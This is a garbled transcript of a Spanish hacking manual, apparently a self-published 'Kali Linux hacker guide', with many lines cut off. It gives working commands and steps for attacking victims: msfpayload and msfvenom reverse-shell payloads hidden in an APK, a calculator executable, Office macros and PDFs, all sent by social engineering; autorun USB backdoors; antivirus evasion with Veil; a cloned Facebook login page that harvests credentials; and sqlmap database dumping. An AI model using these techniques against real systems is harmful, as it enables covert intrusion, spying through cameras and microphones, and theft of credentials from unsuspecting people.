kali linux guia del hacker version 1.0

Upload: enrique

Post on 24-Feb-2018

295 views

Category:

Documents


5 download

TRANSCRIPT

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    1/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    1

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    2/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    2

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    3/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    3

    LIBRO ESCRITO POR: D1n-r3X {Hacker tico}El Autor de nacionalidad Mexicanadeclara que no dar informacin personalde su verdadero nombre y datos personalesya que por motivos personales y legales

    no se har responsable por el uso de este libro,este libro no es con fines de lucro, es una redaccinde los conocimientos del autor D1n-r3x

    Sistemas operativos usados en estelibroWindows 7 Ultimate x64 bits (sistema primerio)Kali Linux 1.0.9 x64bits (sistema virtual)Parrot-Security os 1.6 x86bits (sistema virtual)

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    4/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    4

    COMANDOS BASICOS DE METASPLOIT Primero veremos como iniciar los servicios de metasploit de forma manual, Ya que en algunos casos

    nos facilitara trabajo y tiempo.

    Los comandos a iniciar son los siguientes# service postgresql start #service metasploit start

    #msfconsole

    [Con estos comandos iniciamos la consola de metasploit] es necesario iniciar siempre os servicios de metasploit ya que sin ellos no iniciara a la hora

    Tambin los podemos iniciar de la siguiente forma.Aplicaciones /Herramientas de explotacin /metasploit /metasploit community pro

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    5/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    5

    HACKEAR ANDROID CON APK [Desde una consola de Metasploit]

    Con los siguientes comandos que aparecen se crea un apk maliciosamsfpayload Android/meterpreter/reverse_tcp LHOST=198.66.1.0 LPORT=8080 x > malware.apk /root/Desktop/

    LHOSTAqu vamos a poner la IP de la maquina kali LinuxLPORT Aqu va el puerto al cual se va a conectar la apk maliciosa

    /root/Desktop Guardara el apk en el escritorio de kali LinuxLa IP de Linux la podemos ver con el comando

    #ifconfig

    NOTA :Para que este mtodo funcione correctamente el telfono con cualquier versin de Android daplicaciones con orgenes desconocidos, ya que no tiene forma de autor ni licencia.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    6/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    6

    en esta pagina Http://www.wetransfer.com podemos enviar archivos de forma annima

    o bien lo podemos enviar desde un correo ya sea Gmail,yahoo,Hotmail etc.Add files, aqu cargamos el malware.apk

    Friends email el email de usuario Android al cual le enviaremos el apk maliciosa,bueno es importante que sea el correo que tiene como cuenta en google play store

    Your email, aqu puede ir un correo falso, ejemplo [email protected] Message , Aqu es importante que tenga algo por ejemplo una actualizacin

    de google para el telfono, alguna noticia o promocin, etc.

    El apk la tiene que intalar la victima en su telfono Android, no importa la versinya una vez que la victima lo haya instalado y asu vez abra la aplicacin nos dara

    acceso remoto a todo el telfono, contactos, llamadas, mensajes, fotos.Tambien podremos manipular la cmara y micrfono a nuestra veneficio

    http://www.wetransfer.com/http://www.wetransfer.com/http://www.wetransfer.com/mailto:[email protected]:[email protected]:[email protected]:[email protected]://www.wetransfer.com/
  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    7/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    7

    EXPLOIT CARGADO EXITOSAMENTEYa que la victima descargo la aplicacin tambin nos acaba de dar acceso remoto a su telcomo vemos aqu con el comandosysinfo, vemos la versin de Android que tiene el telfono

    Como podemos ver aqu algunos de los cpara el acceso al telefono

    en este caso se uso el comandowebcam_snap 2El cual no toma una foto con la cmara y l

    la carpeta /root/ de kali Linuxwebcam_snap es la cmara del telefon

    este caso la 2 que es la cmara trasera del tla 1 es la cmara delantera con la cual pod

    la persona detrs del telefono.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    8/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    8

    BACKDOORBAD-USB

    METODO 1{Puerta trasera}

    Archivo bat indetectable& en USB autoejecutable

    Iniciamos setoolkit con el comandosetoolkit , en una nueva terminal

    ya iniciado seleccionamos la opcin1)Social engineering attacks

    Despues la opcin

    10) Powershell attacks vectorsDespues la opcin

    1) Powershell alphanumeric Shell codeinjector

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    9/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    9

    Como vemos aqu ya hay 2 terminales una desetoolkit y otra nueva por debajo la cual es la ruta de archivobat malicio

    En setoolkit ponemos laIP de kali, y el puertoDespues en la opcin de YES para iniciar el metasploit

    y en la otra terminal como podemos ver es la ruta del archivo bay en formato txt,la ruta es la siguiente

    # cd /root/.set/reports/powershell# ls {para ver la lista de archivos}

    # cp x86_powershell_injention.txt /root/Desktopcon el comando cp copiamos el bat al escritorio para editarlo

    para eso hay que renombrar el .txt por .bat

    Como vemos ya est a la escucha esperando el BAT-USBpara hacer esto es necesario convertir el bat a exe en windows en este caso en windows 7, en mi maqu

    victima y acerloauto-ejecutable he invisibleal ojo humano, ya el sistema puede que lo detecte pero no haga nada, estebat fue probado con antivirus y es indete

    que algunos exploits de kali, ya son muy comunes y detectados pero este no.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    10/44

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    11/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    11

    Una vez creados y ocultados dela computadoras comunes solofalta extraer laUSB y volverla a

    poner para ver como correnuestro virus

    Recuerden quemetasploit sequed a la esperando elpayload

    as que vamos a drselo

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    12/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    12

    Aqu se ejecut al momento de conectar elUSB y de lado izquierdo estameterpreter esperando a que termine de cargar elPAYLOAD

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    13/44

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    14/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    14

    OFFICCE BACKDOOR{shikata_ga_nai} {indetectable}

    Como podemos ver aqu creamos un payload con extensinEXE, para despus proceder a convertirlo aVBA y poder inyel cdigo en el documento de office

    escriben el siguiente cdigo que se muestra en la imagen de arribamsfpayload Windows/meterpreter/reverse_tcp LHOST=192.168.64.134 LPORT=4444 ENCODING=shikata_ga_nai x

    /root/Desktop/docx.exeEste nos creara unEXE en el escritorio

    No olvides que los comandoLHOST, LPORTse configuran a nuestra maquinaLinux, es decir laIP enLHOST y el puerto deseado.

    En esta captura de abajo veremos los siguientes comandoslocate exe2vba.rb

    cd /usr/share/metasploit-framework/tolos/ruby exe2vba.rb /root/Desktop/docx.exe /root/Desktop/docx.vba

    {este ltimo comando nos dar nuestro archivo VBA}

    Aqu ya creado el .EXE con los siguientes comandos se convertir a un archivo .VBA para poder leerlo y encriptarlomacro de office, y ya creado lo pasamos el archivo .VBA a una memoriaUSB para proseguir con la macro.

    Nos dirigimos a vista, y creamosuna nueva macro, elegimos elnombre que preferimos,guardan la macro en la casilla deguardar

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    15/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    15

    Despus que este la macro lista seguiremos con la inyeccin del texto codificado porshikata_ga_nai IMPORTANTE, al copiar el texto se crearan varias hojas es recomendable cambiar el tamao y

    en este casa tamao1 colorblanco de preferencia para evitar que la vctima ver a algo inusual

    El archivo lo guardamos como Documento Word con macro habilitada la extensin de archiya guardado el archivo lo cerramos y se enva a la vctima, iniciamos metasploit

    con las configuraciones dehandler y el puerto y la mismaIP con la creamos el archivoexe

    esperamos a que la vctima abra el documento y listo ya tenemos sesin demeterpreterestas captura se hicieron desde mi pc con una mquina virtual para hacer ambos procesos a

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    16/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    16

    PDF INFECTADOMtodo 1

    {puede ser detectado por algunos antivirus}

    cargamos la consola de metasploit, ya previo los servicios de posgresql y metasploit para iniciar la consolauna vez iniciado metasploit usamos el comando

    use exploit/Windows/fileformat/adobe_pdf_embedded_exe

    NOTA:antes de seguir necesitamos unPDF que no est infectado , ejemplo un archivo falso con informacile parezca interesante ya sea una revista por etc., depende de la vctima en este caso usare un archivo

    en formatoPDF, esto es solo para demostrar este exploit el archivo publicado no tendr ningn tipya que estePDF es una prueba del libro sin terminar.

    Este exploit lo que ara en inyectar el cdigo en unPDF para que cuando la vctima lo abra nos de acceso a su darse cuenta es difcil que la vctima se d cuenta dado que con el mtodo de documento de office ppor la extensin del archivo ya que es una extensin .docm

    {documento con macro habilitada}prosigamos con este otro mtodo.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    17/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    17

    set filename D1n-r3X.pdf [ pueden poner el nombre que se les de en mente pero debe de terminarset infilename /root/Desktop/LA BIBLIA.pdf [las comillas dobles son solo si el archivo tiene algn espaci

    sino es as no son necesarias ]set outputpath /root/Desktop/ [ es para copiar el contenido delPDF alpdf infectado ]

    set lhost ip de Linux aqu set lport 4444 [ este puede varia depende del puerto abierto en la pc victima]exploit [ aqu nos generara elPDF infectado en la carpeta /root/.msf4/local/

    en una nueva terminal ejecutamos el comando siguiente

    Podemos apreciar aqu elPDF original y elPDF infectado a simple vista parecen igualescon los siguientes comandos copiamos el contenido al escritorio de kali Linuxcd /root/.msf4/local

    ls [ lista de archivo en carpeta de local ]cp D1n-r3X.pdf /root/Desktop [ comando de copiar archivo con ruta al escritorio]

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    18/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    18

    Una vez hecho lo siguiente configuramos nuestro metasploit a la escucha para que espere el payloaPDF infectado

    Por algn motivo no me cargo el exploit pero el AV lo detecta como malware

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    19/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    19

    PDF INFECTADOMtodo 2

    Comandos a seguiruse exploit/Windows/fileformat/coolpdf_image_stream_bof

    set payload Windows/reverse_tcpset lhostset lportexploit

    {elPDF se guarda en la carpeta root/.msf4/localcon el nombre de msf.pdf}

    Con los siguientes comando copiamos el archivoPDF a nuestro escritorio, como vemos en la imagen se ha creaya una vez copiado al escritorio ya sea que lo mandemos por mensaje o por correo annimo, yo en estvctima pasando el archivo a una memoriaUSB, pero ustedes puede usar su ingenio para ver el mtodo que le para lograr que el payload se cargue correctamente.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    20/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    20

    HACKEO DEFACEBOOK

    {SETOOLKIT}Abrimos setoolkit con el c#setoolkituna vez abierto selecionamopcin 1 Ataque de ingensocial, previo a estoselecionamos la 2 ataque vectores de sitio web, unahecho esto proseguimos copcin 3 Ataque a credencon el metodo havester.una vez finalizado ponemnuesta ip de kali Linux y lla cual se desea optener lodatos de usuario en este caser la de Facebook , estoara es crear una pagina temcon el servidor de apacheabrimos una nueva terminpara ello es necesario inicservicios de apache con elcomando # service apache

    ya una vez hecho estomandamos el url el cual ecaso seria la ip de kali Lincual ser una clonacin depagina de Facebook login{ el usuario ingresa sus daobtendremos su correo ycontrasea}

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    21/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    21

    En cuanto la victima aceda a la pgina clonada no envpersonales como podemos ver en la imagen de la derectenemos el correo y la contraseaque se escribi en la pgina de Facebookeste archivo se guarda en la carpetavar/www es un archivo de texto .txt

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    22/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    22

    HACK WINDOWS THEME{SOLO PARA WINDOWS XP SP3}

    Este metodo solo funciona en windows xp sp3 ya que tiene una vulnerabilidad a este exploit el cuamalware en Sistema xp.

    { la mayor parte de computadoras gubernamentales y de a sociaciones de gobierno en mexico tiene dalos interesados les recomiendo un anlisis de las paginas de gobierno con FOCA, el cual es un pro

    metadatos, pero no me enfocare en ese tema ya que es bajo Windows y este libro ser exclusivo

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    23/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    23

    INYECCION DE BACKDOEN CUALQUIER ARCHIVO

    usaremos el codificadorshikata_ga_n

    para la inyeccin inversa de elpayload en nuearchivo ese, en este caso usaremos la cade la maquina victima la cual tiene w

    ------------------------------------------Nesesitamos el archivo exe el cual lo podem

    dando click derecho y en abrir ubicacincopiamos el archivo a una usb para poder

    y cargar el payload en un nuevo archiv--------------------------------------------------------

    Una vez hecho esto nos pasamos a nuestro sistempara seguir con lo sig

    la codificacin con el exe a el exe cargado co

    Con los siguientes comandos en una terminmsfpayload Windows/meterpreter/reverse_tcp LHOST=180.880.11.1 LPORT=4444 R | msfencode

    x86/shikata_ga_nai c 5 t exe x /root /Desktop/calc.exe o /root /Desktop/calc2.ex

    ----------------------------------------------------------------------------------------------------------------------El archivo se guarda en el escritorio de kali, este mtodo puede emplearse con auto ejecucin como es una aplicacin,se puede hacer con un juego exe, y por supuesto cambiar el icono para

    ----------------------------------------------------------------------------------------------------------------------Despues de esto pasamos el payload calc2.exe a la memoria usb, ya en ello hay que hacer qu

    {EJEMPLO} > Es una nueva calculadora cientfica de Microsoft , que tiene mejor rendimeinto del sistema y ademcrea alternativas de algebra y algoritmos de fsica, etc.< (Solo funciona en Wind

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    24/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    24

    BACKDOOR{solo Windows xp} BAD-USB

    METODO 2

    Este mtodo es con el programa SETOOLKITa diferencia de el mtodo uno esta opcin essolo con la herramienta de SET, nos crea elarchivo .exe junto con el archivo .inf (loscomandos del autoejecutable en usb,cd,dvd)

    Despues de la opcin 1 File-

    format exploit, pondremos la de kali, seleccionamos la opc12 adobe pdf embedded exesocial engeneeringal teminar eso ponemos la rutade nuestro archivo pdf originaal cual se creara una copia conun inyecion maliciosa, en estecaso la ruta a seguir es/root/Desktop/kali.pdf

    NOTA: yo usare meterpreter a64bits, pero en su caso esprobable que que utilicen ax32bits, eso se vera en lasiguiente imagen.

    En su caso usen la opcin 2 , yo usare la 5 ya que ser a x64bitssolo si la vicma corre un sistema a x64bits , por lo regular son maquinas sensillas a esepsion de windows8 y 10 que usansistemas de x64, xp,vista 7 casi siempre son a x32bits

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    25/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    25

    En la ruta de cd /root/Desktop/.set/ hay un archivo llamado template.pdf y uno llamado autorun.inf, anuestro pendrive para la ejecucin de nuestro payload de forma remota.

    Con este comando vemos loarchivos creados de setoolkuna vez creados y copiado den la opcin yes, para carganuestro metasploit precargagracias a set

    Esta vulnerabilidad es nicamente para sistemas operativos con Windows xpse mal, pero no tanto ya que las mayor parte de las empresas en todo Mxico y el mundo aun usan este sistema yasea por programas de la misma empresa que por lo general hacen programas de mano factura, tales empresas yasea de gobierno, o de alguno grande o mediana empresa, inclusive de alguna escuela.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    26/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    26

    Exploit Usando Msfvenom Windows 7

    msfvenom p windows/meterpreter/reverse_tcp e x86/shikata_ga_nai i 5 b \x00 LHOST=180.188.78.1 LPORT= f exe > /root/Desktop/gta.exe

    {Este es el comando para crear nuestro archive con shikata ga nai, en este caso el gta.exe ya que tengta, y talves lo pase como un crack para no cd

    Como vimos antes ya creado el exploit vamos a nuestro metesploit y usamos los siguientes comandos use exploit/multi/handler

    set payload Windows/meterpreter/reverse_tcpset lhostset lport

    Analizado en virus total. Es detectable por la mayora de los antivirus, Este exploit no necesita permi

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    27/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    27

    CODIFICACION DE TROJANO EN BINARIO

    msfpayload windows/meterpreter/reverse_tcp LHOST=ip de Linux aqu LPORT=4444 X > /root/Desktop/msf.exe Este es el trojano normal sin codificacionmsfpayload windows/meterpreter/reverse_tcp LHOST= ip aqu LPORT=444 R | msfencode e x86/countdown c 2x86/shikta_ga_nai c 2 > /root/Desktop/msfencoded.exeEste otro esta codificado con shikata_ga_naiLos podemos usar con la consola de metasploit y exploit/multi/handler y los parmetros que ya conocaqu la detecion de los antivirus en virustotal.

    Este es el primer archivo sin codificar

    Este es el segundo archivo, hay otras alternativas de codificacin pero en este caso se provo la de shiksirve ya que la mayora de los antivirus lo detecta, pero no procupen que en este libro estar lo que usveneficion con o sin fines velignos a la sociedad.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    28/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    28

    EVASION DEL ANTIVIRUS CON VEIL-EVASION{Instalacion de veil & configuracin}

    Esto para actualizar nuestro kali Linux antes de la instalacion de veil-evasion1- apt-get update2- apt-get upgrate

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    29/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    29

    --------------------------------------------------------------------------------------------------------------------------Aqu clonamos la pgina de veil-framework, y seguimos con la instalacin

    Aparecer un cuadro de dialogo escribimos y para seguir--------------------------------------------------------------------------------------------------------------------------

    --------------------------------------------------------------------------------------------------------------------------Esto puede demorar unos minuto en lo que se descarga los archivos necesarios que utiliza V

    --------------------------------------------------------------------------------------------------------------------------

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    30/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    30

    despus de la descarga de paquetes inicia lainstalacin de python,y otras 2 aplicacionesms los pasos para instalar las aplicacionesson iguales a los de windows, y sonnecesarios para Veil-Evasion,-------------------------------------------------------

    NOTA: Esto demora unos minutos , yo uso elsistema en una mquina virtual la cual mepermite guardar las configuraciones ydescarga de kali, en el caso de hacer estospasos en dvd, usb, no guarda nada,

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    31/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    31

    Terminado estas instalaciones, procedemos a ejecutarnuestro programa Veil-Evasionen la terminar que estbamos usando usamos el comandocd .. {esto nos regresara una carpeta atrs a la carpeta deVeil, y escribimos el siguiente comandopython Veil-Evasion.py esto nos ejecutara el programa yacompleto.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    32/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    32

    Es la misma instalacin, para iniciarveil, hay que usar el comando{ chmod +x Veil-Evasion.py , este comando debe de iantes de iniciarlo con python, para descargar python usaremos el comando, apt-get install python-mechanize }

    Con el comando list, vlospayloads disponiblesesta versin deveil tiene

    disponibles, para seindetectables probare

    algunos de ellos,VeilFramework , es una

    herramienta muy simmetasploit, pero su

    funcionalidad es crepayload que los antivirueliminen y adems en

    manera ms sencilla de

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    33/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    33

    Despus del comando list, seleccionamos elpayload nmero 36), ya que la codificacin de este no es detectadmejor que elbat desetoolkit , lo configuramos con los siguientes parmetros:

    set LHOST ip de Linuxset LPORT 4444 {Esto puede variar}

    generate {esto nos gener nuestro archivo exe

    Aqu hay dos opciones1 press [enter] for payload { Esta opcin nos genera el payload con el nombre en las comillas } 2 Aqu podremos un el nombre el cual se le va a dar a nuestro virus { En este caso, payloadfin

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    34/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    34

    Ya creado el payload se guarda en la carpeta siguiente de kali Linuxcd /root/veil-output/compiled/payloadfinal.exe

    {aqu ejecutare el payload en un windows para provarlo}

    Se ejecuta sin necesidad de control de cuentas de usuario ya que en windows 7 & 8 tienen activel payload no carga nada, a simple vista, pero lo que la victima no sabe esque no dio acceso tota

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    35/44

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    36/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    36

    Iexplorer updat{PARROT-SEC

    Nota algunos anpueden bloquea

    Una vez hecho esto con el commando use exploit/windows/browser/ie_cgenericelement_uaf, procegunuestro exploit con el commando show options y cambiaremos algunas opciones como SRVHOST, SR

    Despues de configurar el SRVHOST con nuestra ip de parrot-sec, proseguimos a configurar nuestro owindows 7, configuramos con el siguiente comando. Show targets , Despues con set TARGET 4

    Despues de set LHOST , usamos el comando exploit , y enviamos el enlace malintecionado, y listo.

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    37/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    37

    WEPSPLOITHOMBRE EN MEDIO M

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    38/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    38

    Con el comandouse ( selecionamos el modulo, simmetasploit)vamos a usar el modulo network/

    Despues con el comando show op

    Veremos las opciones a configuraen este caso ser el router y la ip vitimatambin se puede configurar el sn

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    39/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    39

    SQLMAP(Ataque a paginas web )

    Con el comando siguiente podemos analizar la pagina simpre y cuando la pagina sea vulnerable con p

    sqlmap u www.pagina-vulnerable.com/etc.php?=27 dbs

    En este comando si la pagina es vulnerable nos aparecer un dialogo con los siguientes trminos(Y/N) En este caso usaremos la Y y poseguimos a presionar ENTER.

    http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27
  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    40/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    40

    Ya utilizando la opcin de yes en abreviacin y, veremos que la pagina carga las Bases de Datosde qui vamos a seleccionar una, Este puede variar depende de la pagina en algunas puede mostrar mabien puede que solo salga una,

    Este pagina me a mostrado 2 Bases de Datos,(Esto esta en la pagina siguiete)

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    41/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    41

    Como vemos en la imagen, Tenemos 2 bases de datos disponibles, vamos seleccionar la bas, ampos_con el siguiete orden de comandos

    sqlmap u www.pagina-vulnerable.com/etc.php?=27 D ampos_ampoweb tables

    Explicacion breve.

    -D ( Este comando es la orden a ejecutar de la base de datos seleccionada)--tables (En este campos ejecutamos un orden de tablas de la base de datos)

    http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27
  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    42/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    42

    Aqu podemos ver que son 30 tablas disponibles..

  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    43/44

    AUTOR DEL LIBRO: D1n-r3X [Hacke

    43

    Aqu podemos ver las tablas disponibles en este caso vamos a seleccionar lsiguiente tabla

    Con el comando que se mostrara en la pagina siguiente nos va a mostrar laadministracin de la pagina.el comando es el siguiente sqlmap u www.pagina-vulnerable.com/etc.php?=27 D ampos_ampoweb Tadmin_contenidos --columns

    http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27http://www.pagina-vulnerable.com/etc.php?=27
  • 7/25/2019 Kali Linux Guia Del Hacker Version 1.0

    44/44